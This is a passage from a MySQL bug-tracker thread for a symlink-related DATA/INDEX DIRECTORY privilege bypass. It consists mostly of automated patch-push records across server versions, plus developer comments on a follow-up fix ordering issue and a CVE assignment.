Pushed into 5.1.32-ndb-6.4.3 (revid:tomas.ulin@sun.com-20090217134419-5ha6xg4dpedrbmau) (version source revid:tomas.ulin@sun.com-20090203133556-9rclp06ol19bmzs4) (merge vers: 5.1.32-ndb-6.3.22) (pib:6)
[17 Feb 2009 18:20] Bugs System
Pushed into 5.1.32-ndb-6.2.17 (revid:tomas.ulin@sun.com-20090217134216-5699eq74ws4oxa0j) (version source revid:tomas.ulin@sun.com-20090201210519-vehobc4sy3g9s38e) (merge vers: 5.1.32-ndb-6.2.17) (pib:6)
[17 Jun 2009 19:24] Bugs System
Pushed into 5.4.4-alpha (revid:alik@sun.com-20090616183122-chjzbaa30qopdra9) (version source revid:joro@sun.com-20090515134506-5mq3a8fafgbkx6u1) (merge vers: 6.0.12-alpha) (pib:11)
[14 Jul 2009 13:53] Sergei Golubchik
reopened, the fix had a bug: in mysqld.cc, fix_paths() mysql_unpacked_real_data_home was calculated from mysql_real_data_home *before* mysql_real_data_home itself was expanded. For example when mysql_real_data_home was specified as a relative path, mysql_unpacked_real_data_home was interpreting it relatively to a pwd(), not to a mysql_home.
[14 Jul 2009 15:26] Ingo Strüwing
Bug#40980 (Drop table can remove another MyISAM table's data and index files) has been marked as a duplicate of this bug report.
[26 Aug 2009 13:46] Bugs System
Pushed into 5.1.37-ndb-7.0.8 (revid:jonas@mysql.com-20090826132541-yablppc59e3yb54l) (version source revid:jonas@mysql.com-20090826132541-yablppc59e3yb54l) (merge vers: 5.1.37-ndb-7.0.8) (pib:11)
[26 Aug 2009 13:46] Bugs System
Pushed into 5.1.37-ndb-6.3.27 (revid:jonas@mysql.com-20090826105955-bkj027t47gfbamnc) (version source revid:jonas@mysql.com-20090826105955-bkj027t47gfbamnc) (merge vers: 5.1.37-ndb-6.3.27) (pib:11)
[26 Aug 2009 13:48] Bugs System
Pushed into 5.1.37-ndb-6.2.19 (revid:jonas@mysql.com-20090825194404-37rtosk049t9koc4) (version source revid:jonas@mysql.com-20090825194404-37rtosk049t9koc4) (merge vers: 5.1.37-ndb-6.2.19) (pib:11)
[27 Aug 2009 16:32] Bugs System
Pushed into 5.1.35-ndb-7.1.0 (revid:magnus.blaudd@sun.com-20090827163030-6o3kk6r2oua159hr) (version source revid:jonas@mysql.com-20090826132541-yablppc59e3yb54l) (merge vers: 5.1.37-ndb-7.0.8) (pib:11)
[3 Nov 2009 13:49] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/89133

2837 Georgi Kodinov	2009-11-03
      Bug #32167: another privilege bypass with DATA/INDEX DIRECTORY
      
      Fixed a initialization order remark by Serg : correct directory
      expansion order implemented on server startup.
[4 Nov 2009 9:16] Bugs System
Pushed into 5.0.88 (revid:joro@sun.com-20091104091355-hpz6dwgkrfmokj3k) (version source revid:joro@sun.com-20091027131106-1w5i5wrb27oqewk2) (merge vers: 5.0.88) (pib:13)
[4 Nov 2009 9:25] Bugs System
Pushed into 5.1.41 (revid:joro@sun.com-20091104092152-qz96bzlf2o1japwc) (version source revid:kristofer.pettersson@sun.com-20091103162305-08l4gkeuif2ozsoj) (merge vers: 5.1.41) (pib:13)
[10 Nov 2009 11:44] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/89940

2845 Georgi Kodinov	2009-11-03
      Bug #32167: another privilege bypass with DATA/INDEX DIRECTORY
      
      Fixed a initialization order remark by Serg : correct directory
      expansion order implemented on server startup.
[11 Nov 2009 6:52] Bugs System
Pushed into 6.0.14-alpha (revid:alik@sun.com-20091110093407-rw5g8dys2baqkt67) (version source revid:alik@sun.com-20091109080109-7dxapd5y5pxlu08w) (merge vers: 6.0.14-alpha) (pib:13)
[11 Nov 2009 6:59] Bugs System
Pushed into 5.5.0-beta (revid:alik@sun.com-20091109115615-nuohp02h8mdrz8m2) (version source revid:alik@sun.com-20091105092041-sp6eyod7sdlfuj3b) (merge vers: 5.5.0-beta) (pib:13)
[12 Nov 2009 3:50] Paul Dubois
Noted in 5.1.41, 5.5.0, 6.0.14 changelogs.

Additional corrections were made for the symlink-related privilege
problem originally addressed in MySQL 5.1.24. The original fix did
not correctly handle the data directory path name if it contained
symlinked directories in its path, and the check was made only at
table-creation time, not at table-opening time later.
[2 Dec 2009 8:05] Bugs System
Pushed into 5.1.42 (revid:joro@sun.com-20091202080033-mndu4sxwx19lz2zs) (version source revid:joro@sun.com-20091110124212-miog36hnvtfxxb3o) (merge vers: 5.1.41) (pib:13)
[16 Dec 2009 8:38] Bugs System
Pushed into 6.0.14-alpha (revid:alik@sun.com-20091216083311-xorsasf5kopjxshf) (version source revid:alik@sun.com-20091214191830-wznm8245ku8xo702) (merge vers: 6.0.14-alpha) (pib:14)
[16 Dec 2009 8:45] Bugs System
Pushed into 5.5.0-beta (revid:alik@sun.com-20091216082430-s0gtzibcgkv4pqul) (version source revid:alexey.kopytov@sun.com-20091124081906-6pqi7e7sajimog71) (merge vers: 5.5.0-beta) (pib:14)
[16 Dec 2009 8:52] Bugs System
Pushed into mysql-next-mr (revid:alik@sun.com-20091216083231-rp8ecpnvkkbhtb27) (version source revid:alik@sun.com-20091212203859-fx4rx5uab47wwuzd) (merge vers: 5.6.0-beta) (pib:14)
[16 Dec 2009 15:34] Paul Dubois
Already fixed in 5.5.x, 6.0.x.
[17 Dec 2009 11:49] Sergei Golubchik
the last problem got its own CVE-2009-4030
[18 Dec 2009 10:31] Bugs System
Pushed into 5.1.41-ndb-7.1.0 (revid:jonas@mysql.com-20091218102229-64tk47xonu3dv6r6) (version source revid:jonas@mysql.com-20091218095730-26gwjidfsdw45dto) (merge vers: 5.1.41-ndb-7.1.0) (pib:15)
[18 Dec 2009 10:47] Bugs System
Pushed into 5.1.41-ndb-6.2.19 (revid:jonas@mysql.com-20091218100224-vtzr0fahhsuhjsmt) (version source revid:jonas@mysql.com-20091217101452-qwzyaig50w74xmye) (merge vers: 5.1.41-ndb-6.2.19) (pib:15)
[18 Dec 2009 11:02] Bugs System
Pushed into 5.1.41-ndb-6.3.31 (revid:jonas@mysql.com-20091218100616-75d9tek96o6ob6k0) (version source revid:jonas@mysql.com-20091217154335-290no45qdins5bwo) (merge vers: 5.1.41-ndb-6.3.31) (pib:15)
[18 Dec 2009 11:16] Bugs System
Pushed into 5.1.41-ndb-7.0.11 (revid:jonas@mysql.com-20091218101303-ga32mrnr15jsa606) (version source revid:jonas@mysql.com-20091218064304-ezreonykd9f4kelk) (merge vers: 5.1.41-ndb-7.0.11) (pib:15)
[21 Dec 2009 10:36] Tomas Hoger
Can anyone confirm that "Fixed a initialization order remark by Serg" fix is what is referred to in 5.1.41 release notes (and also in .24 and .28 as "additional fix in .41")?  The fix is committed in 5.1 bazaar branch:

http://bazaar.launchpad.net/~mysql/mysql-server/mysql-5.1/revision/1810.3967.4

but it does not seem to have made it to 5.1.41.  Am I missing some other change?
[21 Dec 2009 10:57] Georgi Kodinov
Tomas,

Yes, it should be out with 5.1.42.
[12 Mar 2010 14:11] Bugs System
Pushed into 5.1.44-ndb-7.0.14 (revid:jonas@mysql.com-20100312135944-t0z8s1da2orvl66x) (version source revid:jonas@mysql.com-20100312115609-woou0te4a6s4ae9y) (merge vers: 5.1.44-ndb-7.0.14) (pib:16)
[12 Mar 2010 14:28] Bugs System
Pushed into 5.1.44-ndb-6.2.19 (revid:jonas@mysql.com-20100312134846-tuqhd9w3tv4xgl3d) (version source revid:jonas@mysql.com-20100312060623-mx6407w2vx76h3by) (merge vers: 5.1.44-ndb-6.2.19) (pib:16)
[12 Mar 2010 14:43] Bugs System
Pushed into 5.1.44-ndb-6.3.33 (revid:jonas@mysql.com-20100312135724-xcw8vw2lu3mijrhn) (version source revid:jonas@mysql.com-20100312103652-snkltsd197l7q2yg) (merge vers: 5.1.44-ndb-6.3.33) (pib:16)
[26 Sep 2012 15:42] [ name withheld ]
Further note ... although it's claimed above that the last fix (change of order of operations) was pushed into 5.0.88, I see no such change in the released 5.0.95 tarball.